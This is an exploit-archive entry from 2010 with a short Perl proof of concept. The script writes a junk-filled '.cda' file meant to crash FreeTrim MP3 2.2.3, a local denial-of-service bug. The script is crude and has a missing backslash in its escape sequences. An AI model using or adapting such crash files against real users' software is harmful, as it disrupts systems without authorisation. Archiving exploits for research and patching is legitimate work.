[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FreeTrim MP3 2.2.3 Denial of Service Vulnerability
# Published : 2010-12-02
# Author : h1ch4m
# Previous Title : Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability
# Next Title : Apple Directory Services Memory Corruption


####Exploit Title: FreeTrim MP3  Local Crash PoC
####Software Link: http://www.freetrimmp3.com/downloads/FreeTrimMP3.exe
####Tested on: Win XP SP3
####Date: 02-12-2010
####Author:  h1ch4m
####Email: h1ch4m@live.fr

################################################
#############   sahra dyalna o jazayrya khotna         
################################################

my $file= "1.cda";
my $junk = "x41" x 100;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfullyn";
sleep(1);